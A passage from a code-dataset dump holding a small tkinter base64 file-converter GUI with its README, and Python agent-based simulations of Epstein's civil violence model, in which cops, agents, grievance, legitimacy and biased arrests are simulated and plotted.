tab_control.pack(expand=1, fill=\"both\")\n\n#------------ Encode Frame\ntoolbar = ttk.Frame(window)\ntreeframe = ttk.Frame(window)\n\ntoolbar.pack(side=\"top\", fill=\"x\")\ntreeframe.pack(side=\"bottom\", fill=\"both\", expand=True)\n\ndefault_txt = StringVar(toolbar, value=\"Select the file to convert to base64..\")\nfilepath_txt = Entry(toolbar, width=30, state=\"readonly\", textvariable=default_txt)\n\nselectfile_btn = Button(toolbar, text=\"Select File\", command=select_file)\nconvert_btn = Button(toolbar, text=\"Convert\", state=\"disabled\", command=convert)\nsavefile_btn = Button(toolbar, text=\"Save File\", state=\"disabled\", command=save_file)\nfilepath_txt.pack(side=\"left\")\nselectfile_btn.pack(side=\"left\")\nconvert_btn.pack(side=\"left\")\nsavefile_btn.pack(side=\"left\")\n\noutput_panel = scrolledtext.ScrolledText(treeframe, width=55, height=10, state=\"disabled\")\noutput_panel.pack(side=\"top\", fill=\"both\", expand=True)\n\n#------------ Decode Frame\ndecode_toolbar = ttk.Frame(window)\ndecode_treeframe = ttk.Frame(window)\n\nload_btn = Button(decode_toolbar, text=\"Load File\", command=load_file)\nload_btn.pack(side=\"left\")\ndecodeto_btn = Button(decode_toolbar, text=\"Decode as\", state=\"disabled\", command=decode_and_save_file)\ndecodeto_btn.pack(side=\"left\")\nfilepreview_panel = scrolledtext.ScrolledText(decode_treeframe, width=55, height=10, state=\"disabled\")\nfilepreview_panel.pack(side=\"top\", fill=\"both\", expand=True)\n\nwindow.mainloop()" }, { "alpha_fraction": 0.7647058963775635, "alphanum_fraction": 0.8151260614395142, "avg_line_length": 58.5, "blob_id": "cc4ec29c76756229db0e61eeff7822791087110c", "content_id": "a9b88f13ba58dd5ca892787a1b251f914439fe32", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Markdown", "length_bytes": 119, "license_type": "no_license", "max_line_length": 96, "num_lines": 2, "path": "/README.md", "repo_name": "boonkeato/Base64FileConverter", "src_encoding": "UTF-8", "text": "# Base64FileConverter\nSimple GUI to encode file to base64 string, and to perform decoding of base64 string into a file\n" } ]
2
emguzzi/CivilViolenceGESS
https://github.com/emguzzi/CivilViolenceGESS
0412daab5f3a485e1bafcee950278d71324d1f1c
b2c3d9d8df5b70fd13af3109af57192a8b9efa0c
0368015f80f4deae09ba603b60c5fcbb55bae8a7
refs/heads/main
2023-01-20T00:38:59.024110
2020-11-30T08:44:56
2020-11-30T08:44:56
310,348,880
0
0
null
null
null
null
null
[ { "alpha_fraction": 0.5438520908355713, "alphanum_fraction": 0.5552579164505005, "avg_line_length": 36.842281341552734, "blob_id": "83e601ce6199a0f00574827afbbc66ae38c51b1a", "content_id": "e7f09f7b15cedb1c662404f9d1872ad4271a4a22", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 11573, "license_type": "no_license", "max_line_length": 116, "num_lines": 298, "path": "/attempt_reproduce_epstein_model.py", "repo_name": "emguzzi/CivilViolenceGESS", "src_encoding": "UTF-8", "text": "import numpy as np\r\nimport matplotlib.pyplot as plt\r\nimport random\r\nimport matplotlib.patches as mpatches\r\nimport plotly.graph_objects as go\r\nfrom datetime import datetime\r\nimport os\r\nimport pandas as pd\r\nimport matplotlib as mpl\r\nfrom tqdm import tqdm, trange\r\n# ============================================\r\n# Global variables for the model --> Do the tuning here\r\n# ============================================\r\nnation_dimension = 40 # Will be a (nation_dimension,nation_dimension) matrix\r\nvision_agent = 5 # Agent's vision\r\nvision_cop = 3 # Cop's vision\r\nL = 0.3 # Legitimacy, must be element of [0,1], see paper\r\nT = 0.03 # Tres-hold of agent's activation\r\nJmax = 9 # Maximal Jail time for type 0\r\nalpha=1.3 # how the jmax term affects the estimated risk to rebel\r\nk = 0.5 # Constant for P : estimated arrest probability\r\npercentage_agent=0.7 #percentage of all the cells occupied by agents\r\npercentage_cops=0.037 #percentage of all the cells occupied by cops\r\ntfin = 150 # Final time, i.e. number of time steps to consider\r\n# ============================================\r\n# Classes and functions (see end of file for simulation)\r\n# ============================================\r\n\r\nclass agent():\r\n def __init__(self, nr):\r\n self.nr = nr # Identifier\r\n self.position = np.random.randint(0, nation_dimension, (2)) # Assigns initial random position on the matrix\r\n # locations_agents_dic[nr] = self.position\r\n self.H = np.random.uniform(0, 1) # Hardship, see paper\r\n self.status = 0 # 0: quite, 1:active, 2:Jail\r\n self.G = self.H * (1 - L) # Grievance, see paper\r\n self.R = np.random.uniform(0, 1) # Risk aversion\r\n self.J = 0 # Remaining jail time, 0 if free\r\n self.P = 0 # Estimated arrest probability\r\n self.N = self.R * self.P * Jmax # Agent's net risk\r\n \r\n\r\n def move(self):\r\n # Moves the agent if the agent is not in jail\r\n shift = np.random.randint(-1, 2, (2))\r\n if self.status == 2: # Check for status\r\n shift = np.array([0, 0])\r\n self.position = self.position + shift # Move\r\n self.position[0] = max(min(self.position[0], nation_dimension - 1), 0) # Do not leave the matrix\r\n self.position[1] = max(min(self.position[1], nation_dimension - 1), 0) # Do not leave the matrix\r\n # locations_agents_dic[self.nr] = self.position\r\n\r\n def update_status(self, arrest=False):\r\n # Updates the agent's status\r\n if self.status == 2 and self.J > 0:\r\n # If in Jail, Jail time reduces by 1\r\n self.J = self.J - 1\r\n\r\n elif self.status == 2 and self.J == 0:\r\n # Exits Jail and is now active\r\n self.status = 1\r\n elif arrest:\r\n # Is arrested and assigned a Jail time, see paper\r\n self.status = 2\r\n self.J = np.random.randint(1, Jmax)\r\n elif self.G - self.N > T:\r\n # Get's active, see paper\r\n self.status = 1\r\n \"\"\"print(\"G:\",self.G)\r\n print(\" N:\",self.N)\r\n print(\" P:\",self.P)\r\n print(\" R:\", self.R)\"\"\"\r\n else:\r\n # Keep quite\r\n self.status = 0\r\n\r\n def 
active_near_agents(self, agents):\r\n # Computes number of near active agents\r\n near_agents = 0\r\n for agent in agents:\r\n if agent.status == 1:\r\n # Only active agents\r\n pos = agent.position\r\n if np.linalg.norm(self.position - pos, ord=np.inf) < vision_agent:\r\n # If within vision, count\r\n near_agents += 1\r\n if not self.status == 1:\r\n # To avoid double counting but always count the agent self, see paper\r\n near_agents += 1\r\n return near_agents\r\n\r\n def near_cops(self, cops):\r\n # Counts cops within vision\r\n near_cops = 0\r\n for cop in cops:\r\n pos = cop.position\r\n if np.linalg.norm(self.position - pos, ord=np.inf) < vision_agent:\r\n # If within vision count\r\n near_cops += 1\r\n return near_cops\r\n\r\n def updateP(self, agent, cop):\r\n # Updates estimated arrest probability, see paper\r\n active_agents_near = self.active_near_agents(agent)\r\n cops_near = self.near_cops(cop)\r\n self.P = 1 - np.exp(-k * (cops_near+1) / (active_agents_near)) \r\n # +1 for cops near such that it doesn't output 0 when there is no cop in vision\r\n\r\n def updateN(self):\r\n # Update net risk, see paper\r\n self.N = self.R * self.P * (Jmax**alpha)\r\n\r\n\r\n def time_step(self, agent, cops):\r\n # Comptes one time iteration for the given agent\r\n self.move()\r\n self.updateP(agent, cops)\r\n self.updateN()\r\n self.update_status(arrest=False)\r\n return self\r\n\r\n\r\nclass cop():\r\n def __init__(self, nr):\r\n self.nr = nr # Identifier\r\n self.position = np.random.randint(0, nation_dimension, (2)) # Assigns randomly initial position\r\n\r\n def move(self):\r\n # Moves the cop within vision\r\n shift = np.random.randint(-1, 2, (2))\r\n self.position = self.position + shift\r\n self.position[0] = max(min(self.position[0], nation_dimension - 1), 0) # Do not exit matrix\r\n self.position[1] = max(min(self.position[1], nation_dimension - 1), 0) # Do not exit matrix\r\n\r\n def update_agent_status(self, agents):\r\n # Arrests randomly (with bias based on type) an agent within vision\r\n near_active_agents = [] # List agents within vision\r\n for agent in agents:\r\n pos = agent.position\r\n if np.linalg.norm(self.position - pos, ord=np.inf) < vision_cop:\r\n if agent.status == 1:\r\n near_active_agents.append(agent)\r\n\r\n if len(near_active_agents) > 0:\r\n random.choice(near_active_agents).update_status(arrest=True)\r\n # No one activ in vision, no arrest\r\n\r\n def time_step(self, agents):\r\n # Compute one time iteration for cops\r\n self.move()\r\n self.update_agent_status(agents) # Do arrest if possible\r\n return self\r\n\r\n\r\n# ============================================\r\n# Simulation data \r\n# ============================================\r\nn_agents = int(percentage_agent*nation_dimension**2) # Number of considerate agents\r\nn_cops = int(percentage_cops*nation_dimension**2) # Number of considerate cops\r\n\r\nagents = [agent(n) for n in range(n_agents)] # Generate the agents\r\ncops = [cop(n) for n in range(n_cops)] # Generate the cops\r\n\r\nsave = True # Set to True if want to save the data\r\ninteractive = True # If true computes the html slider stuff\r\nshow_plot = False\r\n\r\n# ============================================\r\n# Simulation computation\r\n# ============================================\r\n\r\nnow = datetime.now() # Gets date and time info\r\ndt_string = now.strftime(\"%d_%m_%Y_%H_%M\")\r\nname_to_save = 'simulation_' + dt_string # All will be save with this name + counter + extensions\r\nif save:\r\n if not os.path.isdir(name_to_save):\r\n 
# If save and directory does not exists, create one\r\n os.mkdir(name_to_save)\r\nname_to_save = name_to_save + '/' + name_to_save\r\n\r\npositions_data = np.empty([tfin, nation_dimension, nation_dimension]) # Stores positional and type data\r\n\r\n\r\ncolor_name_list = [\"white\", \"green\", \"red\", \"black\", \"blue\"]\r\nvalues = [-1, 0, 1, 2, 3]\r\nnames=[\"empty\",\"quiet\",\"rebel\",\"in jail\",\"police\"]\r\n\r\ntime =range(tfin)\r\nD_list = [0]*len(range(tfin))\r\narrested_list = [0]*len(range(tfin))\r\nactive_list = [0]*len(range(tfin))\r\n\r\nfor t in trange(tfin):\r\n arrested = 0\r\n active = 0\r\n # Does the t-th time iteration\r\n positions = np.zeros((nation_dimension, nation_dimension)) - 1 # Initialisation of the matrix\r\n # Values of positions are:\r\n # * -1: no one here\r\n # * 0: quite agent type here\r\n # * 1: active agent type here\r\n # * 2: agent in jail here\r\n # * 3: cop here\r\n for agent in agents:\r\n pos = agent.position\r\n positions[pos[0], pos[1]] = agent.status\r\n if agent.status == 2:\r\n arrested = arrested+1\r\n elif agent.status ==1:\r\n active = active +1\r\n for cop in cops:\r\n pos = cop.position\r\n positions[pos[0], pos[1]] = 3 # Updates matrix data with cops position\r\n positions_data[t, :, :] = positions # Stores the data of the positons\r\n im = plt.imshow(positions, cmap=mpl.colors.ListedColormap(color_name_list))\r\n colors = [im.cmap(im.norm(value)) for value in values]\r\n patches = [mpatches.Patch(color=colors[i], label=names[i]) for i in range(len(values))]\r\n plt.legend(handles=patches, bbox_to_anchor=(1.05, 1), loc=2, borderaxespad=0.)\r\n if show_plot:\r\n plt.show()\r\n # Plots the positions matrix\r\n if save:\r\n plt.savefig(name_to_save + '_time_iter_nr' + str(t) + '.png')\r\n # Saves the positions matrix\r\n # Compute now one time steps for each cop and each agent\r\n cops = [cop.time_step(agents) for cop in cops]\r\n agents = [ag.time_step(agents, cops) for ag in agents]\r\n arrested_list[t] = arrested\r\n active_list[t] = active\r\n\r\nif interactive:\r\n\r\n # Create figure\r\n fig = go.Figure()\r\n # Add traces, one for each slider step\r\n for step in np.arange(0, tfin, 1):\r\n curent_pd = pd.DataFrame(positions_data[step, :, :])\r\n fig.add_trace(go.Heatmap(\r\n z=curent_pd.applymap(str),\r\n colorscale=color_name_list)\r\n )\r\n # Make First trace visible\r\n fig.data[0].visible = True\r\n # Create and add slider\r\n steps = []\r\n\r\n for i in range(len(fig.data)):\r\n step = dict(\r\n method=\"update\",\r\n args=[{\"visible\": [False] * len(fig.data)},\r\n {\"title\": \"Slider switched to step: \" + str(i)}], # layout attribute\r\n )\r\n step[\"args\"][0][\"visible\"][i] = True # Toggle i'th trace to \"visible\"\r\n steps.append(step)\r\n\r\n sliders = [dict(\r\n active=10,\r\n currentvalue={\"prefix\": \"Time step: \"},\r\n pad={\"t\": 50},\r\n steps=steps\r\n )]\r\n\r\n fig.update_layout(sliders=sliders)\r\n fig.show()\r\n if save:\r\n fig.write_html(name_to_save+'.html')\r\n\r\nif save:\r\n lines = ['nation_dimension' + ': ' + str(nation_dimension),\r\n \r\n 'vision_agent' + ': ' + str(vision_agent),\r\n 'vision_cop' + ': ' + str(vision_cop),\r\n 'L' + ': ' + str(L),\r\n 'T' + ': ' + str(T),\r\n 'Jmax' + ': ' + str(Jmax),\r\n 'k' + ': ' + str(k),\r\n 'n_agents' + ': ' + str(n_agents),\r\n 'percentage_agent' + ': ' + str(percentage_agent),\r\n 'percentage_cops' + ': ' + str(percentage_cops),\r\n 'n_cops' + ': ' + str(n_cops),\r\n 'tfin' + ': ' + str(tfin)]\r\n\r\n with open(name_to_save+'_par.txt','w') as 
file:\r\n for line in lines:\r\n file.write(line + '\\n')\r\n file.close()\r\n\r\n fig, ax = plt.subplots()\r\n ax.plot(time, arrested_list,label = 'Total number of arrested agents')\r\n ax.set(xlabel='time (epochs)', ylabel=\"number of agents in jail\",title='Arrested agents')\r\n ax.grid()\r\n fig.savefig(name_to_save+'Arrests.png')\r\n\r\n fig, ax = plt.subplots()\r\n ax.plot(time, active_list,label = 'Total number of active agents')\r\n ax.set(xlabel='time (epochs)', ylabel=\"number of active agents\",title='Active agents')\r\n ax.grid()\r\n fig.savefig(name_to_save+'Active.png')" }, { "alpha_fraction": 0.5549695491790771, "alphanum_fraction": 0.568356990814209, "avg_line_length": 35.34848403930664, "blob_id": "6e73da1d5e2a5135a605c3cc0b3da2cfb8ba512a", "content_id": "7e1d06194b9ef2c29ffad26df0e188063ebaf096", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 7395, "license_type": "no_license", "max_line_length": 116, "num_lines": 198, "path": "/civil_violence2.py", "repo_name": "emguzzi/CivilViolenceGESS", "src_encoding": "UTF-8", "text": "import numpy as np\r\nimport random\r\nfrom tkinter import *\r\nimport time\r\n\r\n# ============================================\r\n# Global variables for the model\r\n# ============================================\r\nnation_dimension = 45 # Will be a (nation_dimension,nation_dimension) matrix\r\nvision_agent = 3 # Agent's vision\r\ninfluence_cop = 3 # Cop's radius of influence\r\nT = 200 # Tres-hold of agent's activation\r\nT_calm = 150 # Treshold needed for the agent to become quiet\r\npercentage_bad_cops=0.1\r\nk = 1 # Constant for P : estimated arrest probability\r\n\r\n# ============================================\r\n# Classes and functions (see end of file for simulation)\r\n# ============================================\r\nclass agent():\r\n def __init__(self, nr):\r\n self.nr = nr # Identifier\r\n self.position = np.random.randint(0, nation_dimension, (2)) # Assigns initial random position on the matrix\r\n # locations_agents_dic[nr] = self.position\r\n self.H = np.random.uniform(0, 1) # Hardship, see paper\r\n self.status = 0 # 0: quite, 1:active\r\n self.Il = np.random.uniform(0, 1) # Percieved Illegitimacy\r\n self.G = self.H * self.Il # Grievance\r\n self.R = np.random.uniform(0, 1) # Risk aversion\r\n self.P = 0 # Estimated arrest probability\r\n\r\n def move(self):\r\n # Moves the agent if the agent is not in jail\r\n shift = np.random.randint(-vision_agent+1, vision_agent, (2))\r\n self.position = self.position + shift # Move\r\n self.position[0] = max(min(self.position[0], nation_dimension - 1), 0) # Do not leave the matrix\r\n self.position[1] = max(min(self.position[1], nation_dimension - 1), 0) # Do not leave the matrix\r\n # locations_agents_dic[self.nr] = self.position\r\n\r\n def active_near_agents(self, agents):\r\n # Computes number of near active agents\r\n near_agents = 0\r\n for agent in agents:\r\n if agent.status == 1:\r\n # Only active agents\r\n pos = agent.position\r\n if np.linalg.norm(self.position - pos, ord=np.inf) < vision_agent:\r\n # If within vision, count\r\n near_agents += 1\r\n if not self.status == 1:\r\n # To avoid double counting but always count the agent self, see paper\r\n near_agents += 1\r\n return near_agents\r\n\r\n def near_cops(self, cops):\r\n # Counts cops within vision\r\n near_cops = 0\r\n for cop in cops:\r\n pos = cop.position\r\n if np.linalg.norm(self.position - pos, ord=np.inf) < vision_agent:\r\n # If within vision count\r\n 
near_cops += 1\r\n return near_cops\r\n\r\n def updateP(self, agents, cops):\r\n # Updates estimated arrest probability, see paper\r\n active_agents_near = self.active_near_agents(agents)\r\n cops_near = self.near_cops(cops)\r\n self.P = 1 - np.exp(-k * cops_near / active_agents_near)\r\n\r\n def percieved_agressivity_of_cops(self, cops):\r\n # Sums over cops agressivity within influence radius\r\n percieved_agressivity = 0\r\n for cop in cops:\r\n pos = cop.position\r\n if np.linalg.norm(self.position - pos, ord=np.inf) < influence_cop:\r\n # If within vision count\r\n percieved_agressivity += cop.agressivity\r\n return percieved_agressivity\r\n\r\n def updateIl(self, cops):\r\n self.Il=self.Il*np.exp(self.percieved_agressivity_of_cops(cops))\r\n\r\n def updateG(self):\r\n # Update net risk, see paper\r\n self.G = self.Il*self.H\r\n\r\n def update_status(self):\r\n # Updates the agent's status\r\n if self.G - self.R*self.P > T:\r\n # Get's active, see paper\r\n self.status = 1\r\n elif self.G - self.R*self.P < T_calm:\r\n # get quite\r\n self.status = 0\r\n # don't change status\r\n\r\n def time_step(self, agent, cops):\r\n # Comptes one time iteration for the given agent\r\n self.move()\r\n self.updateP(agents, cops)\r\n self.updateIl(cops)\r\n self.updateG()\r\n self.update_status()\r\n return self\r\n\r\n\r\nclass cop():\r\n def __init__(self, nr):\r\n self.nr = nr # Identifier\r\n self.position = np.random.randint(0, nation_dimension, (2)) # Assigns randomly initial position\r\n if random.random()<percentage_bad_cops :\r\n self.agressivity = 1\r\n else:\r\n self.agressivity = -0.1\r\n\r\n def move(self):\r\n # Moves the cop withing vision\r\n shift = np.random.randint(-influence_cop+1, influence_cop, (2))\r\n self.position = self.position + shift\r\n self.position[0] = max(min(self.position[0], nation_dimension - 1), 0) # Do not exit matrix\r\n self.position[1] = max(min(self.position[1], nation_dimension - 1), 0) # Do not exit matrix\r\n\r\n def time_step(self, agents):\r\n # Compute one time iteration for cops\r\n self.move()\r\n return self\r\n\r\n\r\n\r\n# ============================================\r\n# Simulation data --> Do the tuning here\r\n# ============================================\r\nn_agents = 220 # Number of considerate agents\r\nn_cops = 40 # Number of considerate cops\r\n\r\n# ============================================\r\n# Simulation computation\r\n# ============================================\r\nagents = [agent(n) for n in range(n_agents)] # Generate the agents\r\ncops = [cop(n) for n in range(n_cops)] # Generate the cops\r\n\r\npositions = np.zeros((nation_dimension, nation_dimension)) - 1 # Initialisation of the matrix\r\n # Values of positions are:\r\n # * -1: no one here\r\n # * 0: quite agent here\r\n # * 1: active agent here\r\n # * 2: cop here\r\nfor agent in agents:\r\n pos = agent.position\r\n positions[pos[0], pos[1]] = agent.status # Updates matrix data with agents position and status\r\nfor cop in cops:\r\n pos = cop.position\r\n positions[pos[0], pos[1]] = 2 # Updates matrix data with cops position\r\n\r\n\r\nt=300 #time in millisecond between to steps\r\nPix = 8 #size of a square in pixel\r\n\r\ndef show(cops,agents):\r\n interface.delete(ALL)\r\n for cop in cops:\r\n pos = cop.position\r\n interface.create_rectangle(Pix*pos[0],Pix*pos[1],Pix*pos[0]+Pix,Pix*pos[1]+Pix,fill=\"blue\")\r\n for agent in agents:\r\n pos = agent.position\r\n stat= agent.status\r\n color=\"green\"\r\n if stat == 1:\r\n color = \"red\"\r\n 
interface.create_rectangle(Pix*pos[0],Pix*pos[1],Pix*pos[0]+Pix,Pix*pos[1]+Pix,fill=color)\r\n\r\n\"\"\"\r\ndef show(cops,agents):\r\n interface.delete(ALL)\r\n for cop in cops:\r\n pos = cop.position\r\n a=random.randrange(0,nation_dimension)\r\n b=random.randrange(0,nation_dimension)\r\n interface.create_rectangle(Pix*a,Pix*b,Pix*a+Pix,Pix*b+Pix,fill=\"blue\")\r\n \"\"\"\r\n\r\ndef loop (cops,agents,step):\r\n for m in range(100):\r\n time.sleep(0.001)\r\n cops = [cop.time_step(agents) for cop in cops]\r\n agents = [ag.time_step(agents, cops) for ag in agents]\r\n show(cops,agents) #update the image \r\n print(\"step \"+str(m))\r\n interface.update()\r\n\r\n#Graphic interface with tkinter\r\nwindow = Tk()\r\nwindow.title(\"Civil violence\")\r\ninterface = Canvas(window,height=nation_dimension*Pix,width= nation_dimension*Pix,bg=\"white\")\r\ninterface.pack()\r\nloop(cops,agents,0)\r\nwindow.mainloop()\r\n" }, { "alpha_fraction": 0.5593020915985107, "alphanum_fraction": 0.5771206021308899, "avg_line_length": 39.1067008972168, "blob_id": "9899bdef540b052857fc0ec0de589456be4486c0", "content_id": "468b8527824db83cf68efc2896edc1af0889cf7a", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 16163, "license_type": "no_license", "max_line_length": 118, "num_lines": 403, "path": "/main.py", "repo_name": "emguzzi/CivilViolenceGESS", "src_encoding": "UTF-8", "text": "import numpy as np\nimport matplotlib.pyplot as plt\nimport random\nimport matplotlib.patches as mpatches\nimport plotly.graph_objects as go\nfrom datetime import datetime\nimport os\nimport pandas as pd\nimport matplotlib as mpl\nfrom tqdm import tqdm, trange\n\n# ============================================\n# Global variables for the model\n# ============================================\n\n# General\nnation_dimension = 40 # Will be a (nation_dimension,nation_dimension) matrix\nvision_agent = 7 # Agent's vision\nvision_cop = 7 # Cop's vision\nL = 0.82 # Legitimacy, must be element of [0,1]\nT = 0.1 # Threshold of agent's activation\nJmax = 15 # Maximal Jail time for type 0\nk = 2.3 # Constant for P: estimated arrest probability\n\n# Model bad cops\npercentage_bad_cops = 0.2\n\n# Model two classes\nD_const = [1,2]\nprob_arrest_class_1 = 0.7 # Probability, given an arrest is made, that the arrested agent is of type 1\nfactor_Jmax1 = 2 # How many time is Jmax for type 1 bigger than for type 0\np_class_1 = 0.6 # Probability for an agent to be in class 1\n\n# ============================================\n# Classes and functions (see end of file for simulation)\n# ============================================\n\nclass agent():\n def __init__(self, nr, L, Jmax, p_class_1):\n self.nr = nr # Identifier\n self.vision_agent = vision_agent\n self.position = np.random.randint(0, nation_dimension, (2)) # Assigns initial random position on the matrix\n # locations_agents_dic[nr] = self.position\n self.type = np.random.choice(2, size=1, p=[1 - p_class_1, p_class_1])[0] # Assigns random type 0 or 1\n self.Jmax = Jmax + self.type * Jmax * (factor_Jmax1 - 1) # Maximal Jail time for agent (depends on type)\n self.H = np.random.uniform(0, 1) # Hardship, see paper\n self.status = 0 # 0: quite, 1:active, 2:Jail\n self.G = self.H * (1 - L) # Grievance, see paper\n self.R = np.random.uniform(0, 1) # Risk aversion\n self.J = 0 # Remaining jail time, 0 if free\n self.P = 0 # Estimated arrest probability\n self.N = self.R * self.P * self.Jmax # Agent's net risk\n self.D = 0 #Percieved discrimination\n 
self.Il = 1-L\n\n def move(self):\n # Moves the agent if the agent is not in jail\n shift = np.random.randint(-self.vision_agent, self.vision_agent+1, (2))\n if self.status == 2: # Check for status\n shift = np.array([0, 0])\n self.position = self.position + shift # Move\n self.position[0] = max(min(self.position[0], nation_dimension - 1), 0) # Do not leave the matrix\n self.position[1] = max(min(self.position[1], nation_dimension - 1), 0) # Do not leave the matrix\n # locations_agents_dic[self.nr] = self.position\n\n def update_status(self, arrest=False):\n # Updates the agent's status\n if self.status == 2 and self.J > 0:\n # If in Jail, Jail time reduces by 1\n self.J = self.J - 1\n\n elif self.status == 2 and self.J == 0:\n # Exits Jail and is now active\n self.status = 1\n elif arrest:\n # Is arrested and assigned a Jail time, see paper\n self.status = 2\n self.J = np.random.randint(1, Jmax)\n elif self.G - (self.N-D_const[self.type]*self.D) > T:\n # Get's active, see paper\n self.status = 1\n else:\n # Keep quite\n self.status = 0\n\n def active_near_agents(self, agents):\n # Computes number of near active agents\n near_agents = 0\n for agent in agents:\n if agent.status == 1:\n # Only active agents\n pos = agent.position\n if np.linalg.norm(self.position - pos, ord=np.inf) < self.vision_agent:\n # If within vision, count\n near_agents += 1\n if not self.status == 1:\n # To avoid double counting but always count the agent self, see paper\n near_agents += 1\n return near_agents\n def compute_arrested_ratio(self,agents,radius):\n #compute the ratio type_1 arrested agents over total arrests\n tot_arrested = 0\n type_1_arrested = 0\n for agent in agents:\n pos = agent.position\n if (np.linalg.norm(self.position - pos, ord=np.inf)<radius) and (agent.status == 2):\n tot_arrested = tot_arrested + 1\n if agent.type == 1:\n type_1_arrested = type_1_arrested + 1\n if tot_arrested == 0:\n ratio = 0.5\n else:\n ratio = type_1_arrested/tot_arrested\n return ratio\n\n def near_cops(self, cops):\n # Counts cops within vision\n near_cops = 0\n for cop in cops:\n pos = cop.position\n if np.linalg.norm(self.position - pos, ord=np.inf) < self.vision_agent:\n # If within vision count\n near_cops += 1\n return near_cops\n\n def updateP(self, agents, cops):\n # Updates estimated arrest probability, see paper\n active_agents_near = self.active_near_agents(agents)\n cops_near = self.near_cops(cops)\n self.P = 1 - np.exp(-k * cops_near / active_agents_near)\n\n def percieved_agressivity_of_cops(self, cops):\n # Sums over cops agressivity within influence radius\n percieved_agressivity = 0\n for cop in cops:\n pos = cop.position\n if np.linalg.norm(self.position - pos, ord=np.inf) < vision_cop:\n # If within vision count\n percieved_agressivity += cop.agressivity\n return percieved_agressivity\n\n def updateIl(self, cops):\n self.Il=self.Il*np.exp(self.percieved_agressivity_of_cops(cops))\n\n def updateN(self):\n # Update net risk, see paper\n self.N = self.R * self.P * self.Jmax\n\n def updateG(self):\n # Update net risk, see paper\n self.G = self.Il*self.H\n\n def updateD(self,agents):\n #update the discrimination factor D\n radius = 40 #set the radius smaller to let D more local, let it to 40 to keep D global\n ratio = self.compute_arrested_ratio(agents,radius)\n self.D = abs(0.5-ratio)\n\n def time_step(self, agent, cops):\n # Comptes one time iteration for the given agent\n self.move()\n self.updateP(agent, cops)\n self.updateN()\n self.updateIl(cops)\n self.updateG()\n self.updateD(agent)\n 
self.update_status(arrest=False)\n return self\n\n\nclass cop():\n def __init__(self, nr):\n self.nr = nr # Identifier\n self.vision_cop = vision_cop\n self.position = np.random.randint(0, nation_dimension, (2)) # Assigns randomly initial position\n self.agressivity = random.choices([1, -0.1],[percentage_bad_cops, 1-percentage_bad_cops])[0]\n\n def move(self):\n # Moves the cop within vision\n shift = np.random.randint(-self.vision_cop, self.vision_cop+1, (2))\n self.position = self.position + shift\n self.position[0] = max(min(self.position[0], nation_dimension - 1), 0) # Do not exit matrix\n self.position[1] = max(min(self.position[1], nation_dimension - 1), 0) # Do not exit matrix\n\n def update_agent_status(self, agents):\n # Arrests randomly (with bias based on type) an agent within vision\n near_active_agents_0 = [] # List type 0 agents within vision\n near_active_agents_1 = [] # List type 1 agents within vision\n for agent in agents:\n pos = agent.position\n if np.linalg.norm(self.position - pos, ord=np.inf) < self.vision_cop:\n if agent.status == 1:\n if agent.type == 0:\n near_active_agents_0.append(agent)\n else:\n near_active_agents_1.append(agent)\n if len(near_active_agents_0) > 0:\n if len(near_active_agents_1) > 0:\n # Both types in vision, compute now which type to arrest\n choice01 = np.random.choice(2, 1, p=[1 - prob_arrest_class_1, prob_arrest_class_1])[0]\n if choice01 == 0:\n # Arrest randomly in type 0\n random.choice(near_active_agents_0).update_status(arrest=True)\n else:\n # Arrest randomly in type 1\n random.choice(near_active_agents_1).update_status(arrest=True)\n else:\n # No type 1 but type 0 in vision, arrest randomly type 0\n random.choice(near_active_agents_0).update_status(arrest=True)\n elif len(near_active_agents_1) > 0:\n # No type 0 vut type 1 in vision, arrest randomly type 1\n random.choice(near_active_agents_1).update_status(arrest=True)\n\n # No one in vision, no arrest\n\n def time_step(self, agents):\n # Compute one time iteration for cops\n self.move()\n self.update_agent_status(agents) # Do arrest if possible\n return self\n\n\n# ============================================\n# Simulation data --> Do the tuning here\n# ============================================\nn_agents = int(0.7*nation_dimension**2) # Number of considerate agents\nn_cops = int(0.04*nation_dimension**2) # Number of considerate cops\ntfin = 200 # Final time, i.e. 
number of time steps to consider\nagents = [agent(n, L, Jmax, p_class_1) for n in range(n_agents)] # Generate the agents\ncops = [cop(n) for n in range(n_cops)] # Generate the cops\n\nsave = True # Set to True if want to save the data\ninteractive = True # If true computes the html slider stuff\nshow_plot = True\n\n# ============================================\n# Simulation computation\n# ============================================\n\nnow = datetime.now() # Gets date and time info\ndt_string = now.strftime(\"%d_%m_%Y_%H_%M\")\nname_to_save = 'simulation_' + dt_string # All will be save with this name + counter + extensions\nif save:\n if not os.path.isdir(name_to_save):\n # If save and directory does not exists, create one\n os.mkdir(name_to_save)\nname_to_save = name_to_save + '/' + name_to_save\n\npositions_data = np.empty([tfin, nation_dimension, nation_dimension]) # Stores positional and type data\n\ncolor_name_list = [\"white\", \"green\", \"red\", \"darkorange\", \"lime\", \"fuchsia\", \"goldenrod\", \"blue\"]\n\ntime =range(tfin)\nD_list = [0]*len(range(tfin))\narrested_list = [0]*len(range(tfin))\ntype_1_arrested_list = [0]*len(range(tfin))\ntype_0_arrested_list = [0]*len(range(tfin))\nactive_list = [0]*len(range(tfin))\ntype_1_active_list = [0]*len(range(tfin))\ntype_0_active_list = [0]*len(range(tfin))\nfor t in trange(tfin):\n arrested = 0\n type_1_arrested = 0\n type_0_arrested = 0\n active = 0\n type_1_active = 0\n type_0_active = 0\n D = 0\n # Does the t-th time iteration\n positions = np.zeros((nation_dimension, nation_dimension)) - 1 # Initialisation of the matrix\n # Values of positions are:\n # * -1: no one here\n # * 0: quite agent type 0 here\n # * 1: active agent type 0 here\n # * 2: agent in jail type 0 here\n # * 3: quite agent type 1 here\n # * 4: active agent type 1 here\n # * 5: agent in jail type 1 here\n # * 6: cop here\n for agent in agents:\n pos = agent.position\n positions[pos[0], pos[1]] = agent.status + 3*agent.type # Updates matrix data with agents position and status\n if agent.status == 2:\n arrested = arrested+1\n if agent.type == 1:\n type_1_arrested = type_1_arrested + 1\n else:\n type_0_arrested = type_0_arrested + 1\n elif agent.status ==1:\n active = active +1\n if agent.type == 1:\n type_1_active =type_1_active+1\n else:\n type_0_active = type_0_active + 1\n\n D = agent.D\n for cop in cops:\n pos = cop.position\n positions[pos[0], pos[1]] = 6 # Updates matrix data with cops position\n positions_data[t, :, :] = positions # Stores the data of the positons\n im = plt.imshow(positions, cmap=mpl.colors.ListedColormap(color_name_list))\n values = [-1, 0, 1, 